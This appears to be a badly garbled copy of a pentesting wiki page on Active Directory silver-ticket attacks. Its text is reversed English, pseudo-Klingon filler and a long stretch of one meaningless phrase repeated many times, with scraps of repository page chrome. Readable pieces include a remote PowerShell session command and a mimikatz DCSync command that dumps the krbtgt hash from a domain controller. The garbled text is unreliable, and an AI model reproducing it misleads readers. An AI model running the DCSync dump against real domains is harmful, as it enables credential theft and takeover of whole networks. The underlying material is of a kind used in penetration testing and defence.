'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh **'e

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

ghItlh winrm remote host connect ways more learn to page the Check:

{% content-ref url="../ntlm/winrm.md" %} winrm.md {% endcontent-ref %}

{% hint style="warning" %} remote computer the on listening and active be winrm that Note. {% endhint %}

LDAP

privilege this With database DC the dump can you DCSync using:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

DCSync jIyajbe' ghaH vItlhutlh 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH 'ej ghaH **'ej

34 KiB Raw Permalink Blame History

Silver Ticket

Silver ticket

On Linux

Linux DaqtaghlaHbe'chugh:

Windows-vaD

Silver Ticket

tlhIngan Hol

Introduction

Silver Ticket

qutlhlaHmeH

Silver tickets Event IDs

qutlhlaHmeH tickets qutlh

CIFS

HOST

HOST + RPCSS

LDAP

34 KiB

Raw Permalink Blame History